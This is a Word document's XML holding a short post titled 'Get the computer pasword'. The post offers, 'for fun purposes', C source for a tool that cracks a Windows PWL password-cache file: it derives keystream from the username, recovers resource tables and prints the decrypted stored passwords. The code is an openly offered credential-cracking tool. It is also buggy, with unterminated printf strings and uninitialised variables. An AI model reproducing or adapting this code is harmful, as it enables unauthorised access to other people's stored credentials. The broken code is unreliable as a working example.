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Default="00143C74">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get the computer pasword</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>--------------------------------------------------------------------------------</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Description :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Use it for fun purposes.As soon as you run this source code,passwords of computer would be displayed..ALL the best </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Code :</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># include&lt;stdio.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># include&lt;stdio.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># include&lt;process.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># include&lt;stdlib.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># include&lt;ctype.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># include&lt;conio.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># include&lt;mem.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>unsigned char huge Data[100001];</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>unsigned char keystream[1001];</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>int Rpoint[300];</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>void main(int argc,char *argv[]){</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>FILE *fd;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>int i,j;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>int size;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>char ch;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>char *name;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>int cracked;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>int sizemask;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>int maxr;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>int rsz;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>int pos;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>int Rall[300]; /* Resourse allocation table */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if(argc&lt;2){</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>printf("usage: glide filename (username)");</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>exit(1);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>/* Read PWL file */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>fd=fopen(argv[1],"rb");</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if(fd==NULL){</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>printf("can't open file %s",argv[1]);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>exit(1);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>size=0;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>while(!feof(fd)){</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Data[size++]=fgetc(fd);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>size--;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>fclose(fd);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>/* Find Username */</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>name=argv[1];</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if(argc&gt;2)name=argv[2];</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>printf("Username:%s&lt;BR&gt;,name);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>/* Copy encrypted text into keystream */</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cracked=size-0x0208;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if(cracked&lt;0)cracked=0;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if(cracked&gt;1000)cracked=1000;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>memcpy(keystream,Data+0x208,cracked);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>/* Generate 20 bytes of keystream */</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>for(i=0;i&lt;20;i++){</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ch=toupper(name[i]);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if(ch==0)break;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if(ch=='.')break;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>keystream[i]^=ch;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>};</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cracked=20;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>/* Find allocated resources */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>sizemask=keystream[0]+(keystream[1]&lt;&lt;8);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>printf("Sizemask:%04X&lt;BR&gt;,sizemask);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>for(i=0;i&lt;256;i++){</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if(Data[i]!=0xff){</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Rall[Data[i]]++;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if(Data[i]&gt;maxr)maxr=Data[i];</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>maxr=(((maxr/16)+1)*16); /* Resourse pointer table size appears to be</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>divisible by 16 */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>/*Search after resources */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Rpoint[0]=0x0208+2*maxr+20+2; /* First resources */</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>for(i=0;i&lt;maxr;i++){</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>/* Find the size of current resourse */</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>pos=Rpoint[i];</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>rsz=Data[pos]+(Data[pos+1]&lt;&lt;8);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>rsz^=sizemask;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>printf("Analysing block with size:%04x (%d:%d)&lt;BR&gt;,rsz,i,Rall[i]);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if((Rall[i]==0)&amp;&amp;(rsz!=0)){</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>printf("Unused resourse has nonzero size!!!&lt;BR&gt;);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>printf("If last line produed any:You may try to recover&lt;BR&gt;);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>printf("Press y to attempt the recovery&lt;BR&gt;);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ch=getch();</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if(ch!='y')exit(0);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>rsz=2;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>i=i-1;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>pos=pos+rsz;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>/* Resourse have a tedency to have the wrong size for some reason*/</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>/* Chech for correct size*/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if(i&lt;maxr-1){</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>while(Data[pos+3]!=keystream[1]){</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>printf(":",Data[pos+3]);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>pos=pos+2; /* Very rude may fail */</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>pos+=2; /* Include pointer in size */</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Rpoint[i+1]=pos;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Rpoint[maxr]=size;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>/* Insert Table data into keystream*/</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>for(i=0;i&lt;=maxr;i++){</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>keystream[20+2*i]^=Rpoint[i] &amp; 0x00ff;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>keystream[21+2*i]^=(Rpoint[i]&gt;&gt;8) &amp; 0x00ff;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cracked+=maxr*2+2;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>printf("%d Bytes of ketstream recoverd &lt;BR&gt;,cracked);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>/* Decrypt resources */</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>for(i=0;i&lt;maxr;i++){</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>rsz=Rpoint[i+1]-Rpoint[i];</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if(rsz&gt;cracked)rsz=cracked;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>printf("Resource[%d](%d)&lt;BR&gt;,i,rsz);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>for(j=0;j&lt;rsz;j++)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>printf("%c",Data[Rpoint[i]+j]^keystream[j]);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>printf("&lt;BR&gt;);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>exit(0);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}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0D3F76"/>
    <w:rsid w:val="00143C74"/>
    <w:rsid w:val="004D2B81"/>
    <w:rsid w:val="00873906"/>
    <w:rsid w:val="00A16A7D"/>
    <w:rsid w:val="00A223CB"/>
    <w:rsid w:val="00B070E8"/>
    <w:rsid w:val="00B7760F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2011-01-26T17:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-01-26T17:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>